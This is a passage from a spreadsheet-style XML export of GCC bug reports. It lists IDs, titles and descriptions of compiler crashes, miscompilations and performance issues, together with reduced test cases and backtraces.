    <t>[rick@WhiteCap lab4] $ g++ -o lilcc cc.cc     
In file included from cc.cc:25:
lilstack.cc:80: Internal compiler error.
lilstack.cc:80: Please submit a full bug report.
lilstack.cc:80: Internal compiler error:
lilstack.cc:80: See  for instructions.
Not knowing gcc internals I don't know why it does this but I'm posting the code that caused this error in the hope someone smarter can figure it out.
Yes I know that the code causing it is ugly as sin and probably wouldn't compile even without the error but I'm hoping this can be of some help :)
Release:
gcc version 2.95.4 20010902 (Debian prerelease)
Environment:
Debian GNU/Linux testing/unstable
How-To-Repeat:
g++ -o lilcc cc.cc
that reliably makes it error there every time</t>
  </si>
  <si>
    <t>richard.luddy</t>
  </si>
  <si>
    <t>GCC-64580</t>
  </si>
  <si>
    <t>very high rs6000_stack_info() usage during LTO Firefox build on ppc64</t>
  </si>
  <si>
    <t>perf top shows very high rs6000_stack_info() usage during final LTO link of libxul (Firefox) on ppc64 e.g.:
  31.34%  lto1  [.]  rs6000_stack_info()
                 rs6000_stack_info()
                 rs6000_stack_info()
                 rs6000_output_function_prologue(_IO_FILE* long)
                 final_start_function(rtx_insn* _IO_FILE* int)
                 rs6000_output_mi_thunk(_IO_FILE* tree_node* long long tree_node*)
                 cgraph_node::expand_thunk(bool bool)
                 cgraph_node::assemble_thunks_and_aliases()
                 cgraph_node::assemble_thunks_and_aliases()
                 cgraph_node::expand()
                 symbol_table::compile()
                 lto_main()
                 compile_file()
  1.36%  cc1plus [.]  _cpp_lex_token
...
powerpc64-unknown-linux-gnu</t>
  </si>
  <si>
    <t>GCC-3699</t>
  </si>
  <si>
    <t>Extraneous labels in debug info - leads to undefined reference when linking</t>
  </si>
  <si>
    <t>The compiler generates references to labels that do
not exist (presumably have been deleted during
optimization passes) i.e.:
grep LC20 debug.s
        .8byte  $LC20
        .8byte  $LC20
(although their names might be different with slightly
 different invocations of the compiler).
Release:
3.1 experimental - 20010716
Environment:
alphaev6-unknown-linux-gnu
How-To-Repeat:
g77 -O2 -g debug.f
/tmp/cc9MtQxQ.o(.debug_info+0xff2): undefined reference to `$LC20'
/tmp/cc9MtQxQ.o(.debug_info+0x1dc9): undefined reference to `$LC20'
...</t>
  </si>
  <si>
    <t>GCC-4555</t>
  </si>
  <si>
    <t>Internal compiler error in eliminate_regs at reload1.c:2571</t>
  </si>
  <si>
    <t xml:space="preserve">	Internal compiler error in eliminate_regs at reload1.c:2571
Release:
3.1 20011011 (experimental)
Environment:
System: Linux Y 2.4.12 #3 SMP Thu Oct 11 23:11:15 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /mirror/d/gcc/configure --disable-nls --prefix=/p/p/gcc-2001-10-12.03h22
How-To-Repeat:
  $ gcc -O2 emacsserver.i
  emacsserver.i: In function `main':
  emacsserver.i:38: Internal compiler error in eliminate_regs at reload1.c:2571
  Please submit a full bug report
  with preprocessed source if appropriate.
  See  for instructions.
  [Exit 1]
Here's emacsserver.i (pared down to the minimum)
--=-=-=
Content-Disposition: attachment filename=emacsserver.i
typedef long int __fd_mask
typedef struct
{
  __fd_mask __fds_bits[1024 / (8 * sizeof (__fd_mask))]
}
fd_set
int
main ()
{
  fd_set rmask
  do
    {
      int __d0 __d1
      __asm__ __volatile__ (cld rep stosl:=c (__d0)
			    =D (__d1):a (0)
			    0 (sizeof (fd_set) / sizeof (__fd_mask))
			    1 (
    }
  while (0)
  if (select (1 &amp;rmask 0 0 0) &lt; 0)
    return 1
  if ((__extension__ (
		       {
			 register char __result
			 __asm__
			   __volatile__ (btl %1%2  setcb %b0:=q (__result):r
					 (((int) (0)) % (8 * sizeof (__fd_mask)))
					 m (((&amp;rmask)-&gt;
					       __fds_bits)[((0) / (8 * sizeof (__fd_mask)))]):cc)
			 __result
		       }
		       )))
    {
    }
}
--=-=-=
FYI it came from this source:
#include 
int
main ()
{
  fd_set rmask
  FD_ZERO (
  if (select (1 &amp;rmask 0 0 0) &lt; 0)
    return 1
  if (FD_ISSET (0 &amp;rmask))
    {
    }
}
-------------------------
  $ gcc -v
  Reading specs from /p/p/gcc-2001-10-12.03h22/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
  Configured with: /mirror/d/gcc/configure --disable-nls --prefix=/p/p/gcc-2001-10-12.03h22
  Thread model: single
  gcc version 3.1 20011011 (experimental)
--=-=-=--
Unformatted:
 --=-=-=
 I reported this problem 10 days ago here:
   http://gcc.gnu.org/ml/gcc-bugs/2001-09/msg00860.html
 but that report included emacsserver.i in its full glory.
 In case it helps I've just confirmed that the bug persists
 in today's sources (at least as of a few hours ago) and
 I've pared down emacsserver.i to a much smaller file that still
 evokes the ICE.</t>
  </si>
  <si>
    <t>GCC-14695</t>
  </si>
  <si>
    <t>[3.3/3.4 only] java.net.NetworkInterface.getByName() throws exception instead of returning null</t>
  </si>
  <si>
    <t>This function throws an exception in a case when networr interface by this name
is not found.  Should return null.
Sun's javadoc -
public static NetworkInterface getByName(String name)
                                  throws SocketException
    Searches for the network interface with the specified name.
    Parameters:
        name - The name of the network interface. 
    Returns:
        A NetworkInterface with the specified name or null if there is no
network interface with the specified name. 
    Throws:
        SocketException - If an I/O error occurs. 
        NullPointerException - If the specified name is null.</t>
  </si>
  <si>
    <t>goryachev</t>
  </si>
  <si>
    <t>GCC-82778</t>
  </si>
  <si>
    <t>crash: insn does not satisfy its constraints</t>
  </si>
  <si>
    <t>gcc trunk rev254211 x86_64.
&gt; cat f.cpp
template  struct c {
  typedef a d[b]
  static a e(d f int g) { return f[g] }
}
template  struct B {
  typedef c h
  typename h::d i
  long j
  a at() { return h::e(i j) }
}
int k m r s t
char l n q
short o p w
struct C {
  int u
}
B v
void x() {
  if (((p &gt; (q ? v.at().u : k)) &gt;&gt; l - 226) + !(n ^ r * m))
    s = ((-(((p &gt; (q ? v.at().u : k)) &gt;&gt; l - 226) + !(n ^ r * m)) &lt; 0) /
             (-(((p &gt; (q ? v.at().u : k)) &gt;&gt; l - 226) + !(n ^ r * m)) ^
              -25 &amp; o) &amp;&amp;
         p) &gt;&gt;
        (0 &lt;= 0
             ? 0 ||
                   (-(((p &gt; (q ? v.at().u : k)) &gt;&gt; l - 226) + !(n ^ r * m)) &lt;
                    0) /
                       (-(((p &gt; (q ? v.at().u : k)) &gt;&gt; l - 226) +
                          !(n ^ r * m)) ^
                        -25 &amp; o)
             : 0)
  w = (p &gt; (q ? v.at().u : k)) &gt;&gt; l - 226
  t = !(n ^ r * m)
}
&gt; gcc -O2 -c f.cpp
f.cpp: In function â€˜void x()â€™:
f.cpp:34:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 77 75 37 4 (parallel [
            (set (reg:CCZ 17 flags)
                (compare:CCZ (plus:SI (reg:SI 0 ax [orig:95 _9 ] [95])
                        (reg:SI 1 dx [orig:102 _16 ] [102]))
                    (const_int 0 [0])))
            (set (reg:SI 2 cx [orig:103 _17 ] [103])
                (plus:SI (reg:SI 0 ax [orig:95 _9 ] [95])
                    (reg:SI 1 dx [orig:102 _16 ] [102])))
        ]) f.cpp:19 225 {*addsi_2}
     (expr_list:REG_UNUSED (reg:SI 2 cx [orig:103 _17 ] [103])
        (nil)))
during RTL pass: cprop_hardreg
f.cpp:34:1: internal compiler error: in extract_constrain_insn at recog.c:2207
0x61c877 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:108
0x61c89d _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:118
0xdf60bd extract_constrain_insn(rtx_insn*)
	../../gcc/gcc/recog.c:2207
0xdff55f copyprop_hardreg_forward_1
	../../gcc/gcc/regcprop.c:790
0xe001df execute
	../../gcc/gcc/regcprop.c:1296
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-11378</t>
  </si>
  <si>
    <t>Unbuffered sputn is slow</t>
  </si>
  <si>
    <t>basic_filebuf::sputn is much slower than fwrite for unbuffered output. It seems
that sputn calls write once for each character but fwrite calls write only once.</t>
  </si>
  <si>
    <t>GCC-58934</t>
  </si>
  <si>
    <t>[4.9 Regression]: build fails on cris-elf in reload_cse_simplify_operands for newlib dtoa.c</t>
  </si>
  <si>
    <t>Created attachment 31115
Repeat as ./cc1 -fpreprocessed -O2 -o dtoa.s dtoa.i
Revision r204205 caused the build for cris-elf to fail as follows:
/tmp/break20131030_05/gccobj/./gcc/xgcc -B/tmp/break20131030_05/gccobj/./gcc/ -nostdinc -B/tmp/break20131030_05/gccobj/cris-elf/v8/newlib/ -isystem /tmp/break20131030_05/gccobj/cris-elf/v8/newlib/targ-include -isystem /tmp/break20131030_05/gcc/newlib/libc/include -B/tmp/break20131030_05/gccobj/cris-elf/v8/libgloss/cris -L/tmp/break20131030_05/gccobj/cris-elf/v8/libgloss/libnosys -L/tmp/break20131030_05/gcc/libgloss/cris -B/tmp/break20131030_05/pre/cris-elf/bin/ -B/tmp/break20131030_05/pre/cris-elf/lib/ -isystem /tmp/break20131030_05/pre/cris-elf/include -isystem /tmp/break20131030_05/pre/cris-elf/sys-include  -march=v8 -mbest-lib-options -DPACKAGE_NAME=\newlib\ -DPACKAGE_TARNAME=\newlib\ -DPACKAGE_VERSION=\1.20.0\ -DPACKAGE_STRING=\newlib\ 1.20.0\ -DPACKAGE_BUGREPORT=\\ -DPACKAGE_URL=\\ -I. -I/tmp/break20131030_05/gcc/newlib/libc/stdlib -DHAVE_RENAME -D_USE_WRITE -DCOMPACT_CTYPE -fno-builtin      -g -O2  -march=v8 -mbest-lib-options -c -o lib_a-dtoa.o `test -f 'dtoa.c' || echo '/tmp/break20131030_05/gcc/newlib/libc/stdlib/'`dtoa.c
/tmp/break20131030_05/gcc/newlib/libc/stdlib/dtoa.c: In function 'quorem':
/tmp/break20131030_05/gcc/newlib/libc/stdlib/dtoa.c:142:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 289 35 288 3 (set (reg/v/f:SI 171 [orig:132 S ] [132])
        (reg/v/f:SI 11 r11 [orig:132 S ] [132])) 37 {*movsi_internal}
     (nil))
/tmp/break20131030_05/gcc/newlib/libc/stdlib/dtoa.c:142:1: internal compiler error: in reload_cse_simplify_operands at postreload.c:411
0x8a5018 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/tmp/break20131030_05/gcc/gcc/rtl-error.c:109
0x8a503f _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/tmp/break20131030_05/gcc/gcc/rtl-error.c:120
0x858866 reload_cse_simplify_operands
	/tmp/break20131030_05/gcc/gcc/postreload.c:411
0x858b44 reload_cse_simplify
	/tmp/break20131030_05/gcc/gcc/postreload.c:123
0x858b44 reload_cse_regs_1
	/tmp/break20131030_05/gcc/gcc/postreload.c:220
0x858bd3 reload_cse_regs
	/tmp/break20131030_05/gcc/gcc/postreload.c:68
0x858bd3 rest_of_handle_postreload
	/tmp/break20131030_05/gcc/gcc/postreload.c:2332
0x858bd3 execute
	/tmp/break20131030_05/gcc/gcc/postreload.c:2368
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[8]: *** [lib_a-dtoa.o] Error 1
make[8]: Leaving directory `/tmp/break20131030_05/gccobj/cris-elf/v8/newlib/libc/stdlib'
Author of commit CC:ed.  Preprocessed code attached.</t>
  </si>
  <si>
    <t>GCC-49353</t>
  </si>
  <si>
    <t>C++ frontend should not declare function EXTERN when it forces them to stay</t>
  </si>
  <si>
    <t>Hi
testsuite/g++.dg/opt/inline8.C shows problem where C++ frontend produce extern inline function foo.
Now it wants to make it stay in program that happens via:
void
mark_needed (tree decl)
{
  /* It's possible that we no longer need to set
     TREE_SYMBOL_REFERENCED here directly but doing so is
     harmless.  */
  TREE_SYMBOL_REFERENCED (DECL_ASSEMBLER_NAME (decl)) = 1
  mark_decl_referenced (decl)
}
Note that symbol referenced hack.  This match corresponding hack in cgraphunit.c:
   /* ??? If the assembler name is set by hand it is possible to assemble
      the name later after finalizing the function and the fact is noticed
      in assemble_name then.  This is arguably a bug.  */
   if (DECL_ASSEMBLER_NAME_SET_P (decl)
       &amp;&amp; TREE_SYMBOL_REFERENCED (DECL_ASSEMBLER_NAME (decl)))
     return true
The declaration looks as:
 &lt;function_decl 0x7ffff76d9200 operator new
    type &lt;function_type 0x7ffff76d8540
        type 
            public unsigned DI
            size 
            unit size 
            align 64 symtab 0 alias set -1 canonical type 0x7ffff77a2f18
            pointer_to_this &gt;
        QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 canonical type 0x7ffff76d8498
        arg-types 
            chain 
                chain &gt;&gt;&gt;
        throws &gt;
    nothrow public static external weak autoinline decl_5 QI defer-output file a.C line 6 col 14 align 8 context  initial 
    arguments &lt;parm_decl 0x7ffff7795908 D.2065
        type  unit size 
            align 64 symtab 0 alias set -1 canonical type 0x7ffff77a2690 precision 64 min  max &gt;
        unsigned DI file a.C line 6 col 27 size  unit size 
        align 64 context 
        arg-type 
        chain 
            used unsigned DI file a.C line 6 col 48 size  unit size 
            align 64 context 
            arg-type &gt;&gt;
    result 
        unsigned ignored DI file a.C line 6 col 57 size  unit size 
        align 64 context &gt;
    full-name void* operator new(long unsigned int void*) throw ()
    not-really-extern pending-inline-info 0x7ffff778bcb0
    struct-function 0x7ffff76da1c8 chain &gt;
I believe that the correct way to represnet this is to drop EXTERN flag in those and similar cases where C++ FE currently use mark_decl_referenced.
How hard is to fix this?</t>
  </si>
  <si>
    <t>GCC-59446</t>
  </si>
  <si>
    <t>loop2_doloop creates constant comparison and dead jump</t>
  </si>
  <si>
    <t>After the commit that fixed PR 58640
http://gcc.gnu.org/viewcvs?rev=203463&amp;root=gcc&amp;view=rev
the SH specific test case gcc.target/sh/pr51244-18.c caught the following sequence:
.L15:
	mov	#0r1      // r1 = 0
	tst	r1r1      // T = r1 == 0
	bf.s	.L7        // if (T == 0) goto .L7
	add	#-4r9
The branch above never happens and is dead code.
Something causes the loop2_doloop RTL pass to create the following code which results in the above final code. 
(code_label 108 107 109 4 2  [0 uses])
(note 109 108 110 4 [bb 4] NOTE_INSN_BASIC_BLOCK)
      .
      .
      .
(insn 177 176 185 4 (set (reg:SI 304)
        (plus:SI (reg:SI 305)
            (const_int 1 [0x1]))) -1
     (nil))
(note 185 177 180 16 [bb 16] NOTE_INSN_BASIC_BLOCK)
(insn 180 185 182 16 (set (reg:SI 306)
        (plus:SI (reg/v:SI 278 [ k ])
            (const_int -8 [0xfffffffffffffff8]))) -1
     (nil))
(insn 182 180 183 16 (set (reg:SI 307)
        (const_int -8 [0xfffffffffffffff8])) -1
     (nil))
(insn 183 182 184 16 (set (reg:SI 147 t)
        (ge:SI (reg:SI 306)
            (reg:SI 307))) -1
     (nil))
(jump_insn 184 183 181 16 (set (pc)
        (if_then_else (eq (reg:SI 147 t)
                (const_int 0 [0]))
            (label_ref 181)
            (pc))) -1
     (int_list:REG_BR_PROB 0 (nil))
 -&gt; 181)
(code_label 181 184 178 14 10  [1 uses])
(note 178 181 186 14 [bb 14] NOTE_INSN_BASIC_BLOCK)
(insn 186 178 179 14 (set (reg:SI 304)
        (const_int 1 [0x1])) -1
     (nil))
(note 179 186 155 15 [bb 15] NOTE_INSN_BASIC_BLOCK)
      .
      .
      .
      .
      .
      .
(code_label 149 146 150 9 5  [1 uses])
(note 150 149 151 9 [bb 9] NOTE_INSN_BASIC_BLOCK)
(insn 151 150 152 9 (set (reg/v:SI 261 [ k ])
        (plus:SI (reg/v:SI 261 [ k ])
            (const_int -8 [0xfffffffffffffff8]))) pr51244-18.c:48 68 {*addsi3_compact}
     (nil))
(insn 152 151 175 9 (set (reg:SI 147 t)
        (ge:SI (reg/v:SI 261 [ k ])
            (const_int 0 [0]))) pr51244-18.c:49 20 {cmpgesi_t}
     (nil))
(jump_insn 175 152 174 9 (parallel [
            (set (pc)
                (if_then_else (ne:SI (reg:SI 304)
                        (const_int 1 [0x1]))
                    (label_ref 174)
                    (pc)))
            (set (reg:SI 304)
                (plus (reg:SI 304)
                    (const_int -1 [0xffffffffffffffff])))
            (clobber (reg:SI 147 t))
        ]) pr51244-18.c:49 -1
     (int_list:REG_BR_PROB 9700 (nil))
 -&gt; 174)
jump_insn 175 is SH's decrement-and-test pattern that is used for loops.</t>
  </si>
  <si>
    <t>GCC-71439</t>
  </si>
  <si>
    <t>[7 Regression] wrong code at -O3 in 32-bit and 64-bit mode on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The following code is miscompiled by the trunk at -O3 in both 32-bit and 64-bit modes on x86_64-linux-gnu. 
$: gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160606 (experimental) [trunk revision 237156] (GCC) 
$: 
$: gcc-trunk -O3 small.c  ./a.out
0
$: gcc-trunk -O2 small.c  ./a.out
6
$: 
$: cat small.c
int printf(const char* ...)
int a b c
short fn1(int p1 int p2) { return p1 + p2 }
int main() {
  a = 0
  for ( a &lt; 30 a = fn1(a 4)) {
    c = b
    b = 6
  }
  printf(%d\n c)
  return 0
}
$:</t>
  </si>
  <si>
    <t>GCC-48238</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/debug/dwarf2/pr47939-0.c scan-assembler on *-apple-darwin*</t>
  </si>
  <si>
    <t>revision:	     171245
Author:	rguenth
Date:	Mon Mar 21 15:32:21 2011 UTC (22 hours 54 minutes ago)
Changed paths:	7
Log Message:	
2011-03-21  Richard Guenther  
	PR c/47939
	* c-decl.c (grokdeclarator): Drop to the main variant only
	for array types.  Drop flag_gen_aux_info check.
	* gcc.dg/debug/dwarf2/pr47939-1.c: New testcase.
	* gcc.dg/debug/dwarf2/pr47939-2.c: Likewise.
	* gcc.dg/debug/dwarf2/pr47939-3.c: Likewise.
	* gcc.dg/debug/dwarf2/pr47939-4.c: Likewise.
These tests fail on *-apple-darwin* (see http://gcc.gnu.org/ml/gcc-testresults/2011-03/msg02177.html). The occurrences of 'Harry_t' in the assembly file are:
   39 - 	.byte	0x5	# DW_AT_encoding
   40 - 	.ascii int\0	# DW_AT_name
   41 - 	.byte	0x5	# uleb128 0x5 (DIE (0xc2) DW_TAG_typedef)
   42 : 	.ascii Harry_t\0	# DW_AT_name
   43 + 	.byte	0x1	# DW_AT_decl_file (/opt/gcc/work/gcc/testsuite/gcc.dg/debug/dwarf2/pr47939-1.c)
   44 + 	.byte	0x4	# DW_AT_decl_line
   45 + 	.long	0x9b	# DW_AT_type
  165 - 	.long	0x9b	# DIE offset
  166 - 	.ascii _Harry\0	# external name
  167 - 	.long	0xc2	# DIE offset
  168 : 	.ascii Harry_t\0	# external name
  169 + 	.long	0
  170 + 	.section __DWARF__debug_lineregulardebug
  171 + Lsection__debug_line:</t>
  </si>
  <si>
    <t>GCC-50622</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: verify_gimple failed for std::complex</t>
  </si>
  <si>
    <t>NOTE ok with -std=gnu++0x
cat ice47.cc
#include 
template  struct LorentzVector
{
template 
LorentzVector &amp; operator+=(const LorentzVector &amp; a) {
theX += a.theX
theY += a.theY
theZ += a.theZ
theT += a.theT
return *this
}
Value theX
Value theY
Value theZ
Value theT
}
template 
inline LorentzVector
operator+(LorentzVector a const LorentzVector &amp; b) {
return a += b
}
std::complex evaluate() {
LorentzVector &gt; v1
LorentzVector &gt; veca = v1 + v1
return veca.theT
}
Macintosh-203:ctest innocent$ c++ -O2 -c ice47.cc 
ice47.cc: In function â€˜std::complex evaluate()â€™:
ice47.cc:26:22: error: invalid rhs for gimple memory store
a$_M_value
v1$_M_value
# .MEM_14 = VDEF 
a$_M_value = v1$_M_value
ice47.cc:26:22: error: invalid rhs for gimple memory store
a$16$_M_value
v1$theY$_M_value
# .MEM_15 = VDEF 
a$16$_M_value = v1$theY$_M_value
ice47.cc:26:22: error: invalid rhs for gimple memory store
a$32$_M_value
v1$32$_M_value
# .MEM_16 = VDEF 
a$32$_M_value = v1$32$_M_value
ice47.cc:26:22: error: invalid rhs for gimple memory store
a$48$_M_value
v1$theT$_M_value
# .MEM_17 = VDEF 
a$48$_M_value = v1$theT$_M_value
ice47.cc:26:22: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Macintosh-203:ctest innocent$ c++ -O2 -c ice47.cc  -std=gnu++0x
Macintosh-203:ctest innocent$</t>
  </si>
  <si>
    <t>GCC-57609</t>
  </si>
  <si>
    <t>S/390 ESA mode bootstrap failure since r197266</t>
  </si>
  <si>
    <t>cc1 -fpreprocessed libgcc2.i -quiet -dumpbase libgcc2.c -mlong-double-128 -mesa -m31 -march=g5 -auxbase-strip _negdi2.o -g -g -g -O2 -O2 -O2 -Wextra -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -version -fbuilding-libgcc -fno-stack-protector -fPIC -fvisibility=hidden -o libgcc2.s
Program received signal SIGSEGV Segmentation fault.
0x70685820 in ?? ()
(gdb) bt
#0  0x70685820 in ?? ()
#1  0x006cc074 in fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*) ()
#2  0x00714c20 in fold(tree_node*) ()
#3  0x00537e0c in c_fully_fold_internal(tree_node* bool bool* bool*) ()
#4  0x00538998 in c_fully_fold(tree_node* bool bool*) ()
#5  0x004e81ba in build_function_call_vec(unsigned int tree_node* vec* vec*) ()
#6  0x004fd24e in c_parser_postfix_expression_after_primary(c_parser* unsigned int c_expr) ()
#7  0x004f57e8 in c_parser_postfix_expression(c_parser*) ()
#8  0x004f6b4c in c_parser_unary_expression(c_parser*) ()
#9  0x004fb0ac in c_parser_cast_expression(c_parser* c_expr*) ()
#10 0x004fb2a6 in c_parser_binary_expression(c_parser* c_expr* c_parser_prec) ()
#11 0x004fba44 in c_parser_conditional_expression(c_parser* c_expr*) ()
#12 0x004fc00c in c_parser_expr_no_commas(c_parser* c_expr*) ()
#13 0x004fc49c in c_parser_expression(c_parser*) ()
#14 0x004f588a in c_parser_postfix_expression(c_parser*) ()
#15 0x004f6b4c in c_parser_unary_expression(c_parser*) ()
#16 0x004fb0ac in c_parser_cast_expression(c_parser* c_expr*) ()
#17 0x004fb2a6 in c_parser_binary_expression(c_parser* c_expr* c_parser_prec) ()
#18 0x004fba44 in c_parser_conditional_expression(c_parser* c_expr*) ()
#19 0x004fc00c in c_parser_expr_no_commas(c_parser* c_expr*) ()
#20 0x004fc49c in c_parser_expression(c_parser*) ()
#21 0x004fc924 in c_parser_expression_conv(c_parser*) ()
#22 0x00505784 in c_parser_statement_after_labels(c_parser*) ()
#23 0x00502528 in c_parser_compound_statement_nostart(c_parser*) ()
#24 0x00502ce0 in c_parser_compound_statement(c_parser*) ()
#25 0x00503936 in c_parser_declaration_or_fndef(c_parser* bool bool bool bool bool tree_node**)
    ()
#26 0x005083fc in c_parser_external_declaration(c_parser*) ()
#27 0x00508d02 in c_parse_file() ()
#28 0x0054e950 in c_common_parse_file() ()
#29 0x008e2650 in compile_file() ()
#30 0x008e485a in toplev_main(int char**) ()
#31 0x7dd008e6 in __libc_start_main (main=0x4aca88  argc=33 ubp_av=0x7fffef44 
    init= fini=0xd11ecc  rtld_fini=0x7dfef84c  
    stack_end=0x7fffeed8) at libc-start.c:226
#32 0x004acbd6 in _start ()</t>
  </si>
  <si>
    <t>GCC-40328</t>
  </si>
  <si>
    <t>[4.5 Regression] internal compiler error: in set_ssa_val_to at tree-ssa-sccvn.c:1811</t>
  </si>
  <si>
    <t>The attached Fortran source when compiled with a recent version of the trunk gives the above ICE.
Compile options: -O3 -c.</t>
  </si>
  <si>
    <t>GCC-52727</t>
  </si>
  <si>
    <t>[4.9 Regression] internal compiler error at dwarf2cfi.c2:685</t>
  </si>
  <si>
    <t>Created attachment 27002
Preprocessed file
gcc-4.7.0 fails compiling qt 4.7 with : internal compiler error: in connect_traces at dwarf2cfi.c:2685
System type:
Target: Linux 2.6.39 GCC 4.7.0 eglibc 2.15
GCC version:
Using built-in specs.
COLLECT_GCC=/opt/toolchains/atom32-eglibc-std-2.15-gcc-4.7.0-binutils-2.22/bin/i686-linux-cc
COLLECT_LTO_WRAPPER=/opt/toolchains/atom32-eglibc-std-2.15-gcc-4.7.0-binutils-2.22/libexec/gcc/i686-fbx-linux-gnu/4.7.0/lto-wrapper
Target: i686-fbx-linux-gnu
Configured with: /home/florian/work/gen-toolchain/trunk/targets/src/gcc-4.7.0/configure --build=x86_64-build_unknown-linux-gnu --host=x86_64-build_unknown-linux-gnu --target=i686-fbx-linux-gnu --prefix=/opt/toolchains/atom32-eglibc-std-2.15-gcc-4.7.0-binutils-2.22 --with-sysroot=/opt/toolchains/atom32-eglibc-std-2.15-gcc-4.7.0-binutils-2.22/i686-fbx-linux-gnu/sysroot --enable-languages=cc++ --with-arch=atom --with-pkgversion='crosstool-NG 1.14.1' --enable-__cxa_atexit --disable-libmudflap --disable-libgomp --disable-libssp --with-gmp=/home/florian/work/gen-toolchain/trunk/targets/i686-fbx-linux-gnu/build/static --with-mpfr=/home/florian/work/gen-toolchain/trunk/targets/i686-fbx-linux-gnu/build/static --with-mpc=/home/florian/work/gen-toolchain/trunk/targets/i686-fbx-linux-gnu/build/static --with-ppl=/home/florian/work/gen-toolchain/trunk/targets/i686-fbx-linux-gnu/build/static --with-cloog=/home/florian/work/gen-toolchain/trunk/targets/i686-fbx-linux-gnu/build/static --with-libelf=/home/florian/work/gen-toolchain/trunk/targets/i686-fbx-linux-gnu/build/static --with-host-libstdcxx='-static-libgcc -Wl-Bstatic-lstdc++ -lm -L/home/florian/work/gen-toolchain/trunk/targets/i686-fbx-linux-gnu/build/static/lib -lpwl' --enable-threads=posix --enable-target-optspace --without-long-double-128 --disable-nls --disable-multilib --with-local-prefix=/opt/toolchains/atom32-eglibc-std-2.15-gcc-4.7.0-binutils-2.22/i686-fbx-linux-gnu/sysroot --enable-c99 --enable-long-long
Thread model: posix
gcc version 4.7.0 (crosstool-NG 1.14.1) 
no patches have been applied to the gcc sources.
Command-line triggering the bug:
/opt/toolchains/atom32-eglibc-std-2.15-gcc-4.7.0-binutils-2.22/bin/i686-linux-g++ -c -include .pch/release-shared-emb-x86/QtGui -pipe -g -m32 -Os -ffunction-sections -fdata-sections -std=c++0x -I/home/florian/work/fbx/buildroot/build/usr/include/freetype2 -fvisibility=hidden -fvisibility-inlines-hidden -Wall -W -Wno-unused-parameter -Wno-inline -D_REENTRANT -fPIC -DQT_SHARED -DQT_BUILD_GUI_LIB -DQT_NO_USING_NAMESPACE -DQT_NO_CAST_TO_ASCII -DQT_ASCII_CAST_WARNINGS -DQT_MOC_COMPAT -DQT_USE_FAST_OPERATOR_PLUS -DQT_USE_FAST_CONCATENATION -DQT_NO_FONTCONFIG -DQT_NO_OPENTYPE -DQT_NO_STYLE_MAC -DQT_NO_STYLE_WINDOWSVISTA -DQT_NO_STYLE_WINDOWSXP -DQT_NO_STYLE_GTK -DQT_NO_STYLE_WINDOWSCE -DQT_NO_STYLE_WINDOWSMOBILE -DQT_NO_STYLE_S60 -DQ_INTERNAL_QAPP_SRC -DQT_NO_DEBUG -DQT_CORE_LIB -DQT_HAVE_MMX -DQT_HAVE_3DNOW -DQT_HAVE_SSE -DQT_HAVE_MMXEXT -DQT_HAVE_SSE2 -DQT_HAVE_SSE3 -DQT_HAVE_SSSE3 -DQT_HAVE_SSE4_1 -DQT_HAVE_SSE4_2 -DQT_HAVE_AVX -D_LARGEFILE64_SOURCE -D_LARGEFILE_SOURCE -I/home/florian/work/fbx/buildroot/packages/qt/gitsrc/mkspecs/qws/linux-fbx-g++ -I/home/florian/work/fbx/buildroot/packages/qt/gitsrc/src/gui -I../../include/QtCore -I../../include -I../../include/QtGui -I.rcc/release-shared-emb-x86 -I/home/florian/work/fbx/buildroot/packages/qt/gitsrc/src/gui/image -I/home/florian/work/fbx/buildroot/packages/qt/gitsrc/src/3rdparty/harfbuzz/src -I/home/florian/work/fbx/buildroot/packages/qt/gitsrc/src/gui/dialogs -I.moc/release-shared-emb-x86 -I.uic/release-shared-emb-x86 -I/home/florian/work/fbx/buildroot/build/usr/include -I. -o .obj/release-shared-emb-x86/qstylehelper.o /home/florian/work/fbx/buildroot/packages/qt/gitsrc/src/gui/styles/qstylehelper.cpp           
/home/florian/work/fbx/buildroot/packages/qt/gitsrc/src/gui/styles/qstylehelper.cpp: In function 'QPolygonF QStyleHelper::calcLines(const QStyleOptionSlider*)':
/home/florian/work/fbx/buildroot/packages/qt/gitsrc/src/gui/styles/qstylehelper.cpp:206:1: internal compiler error: in connect_traces at dwarf2cfi.c:2685</t>
  </si>
  <si>
    <t>f.fainelli</t>
  </si>
  <si>
    <t>GCC-50810</t>
  </si>
  <si>
    <t>c++0x-compat does not warn about narrowing conversions</t>
  </si>
  <si>
    <t>The following program is rejected by g++ in -std=c++0x mode (assuming 'char' is signed) but does not raise any warnings when compiled with -Wc++0x-compat:
int main() {
   char data[] = { 0xff }
   char value = 0xff
}
This is significantly the largest source of compatibility errors in our code-base today (&gt;95% of our known issues) so it would be very useful if the warning caught these.</t>
  </si>
  <si>
    <t>alisdairm</t>
  </si>
  <si>
    <t>GCC-5928</t>
  </si>
  <si>
    <t>parse error before `or'</t>
  </si>
  <si>
    <t>gcc generates parse error on the following legal code:
#include 
int func(int or){
        return 0
}
int main(int argc char **argv){
        int or = 1
        func(or)
        return 0
}
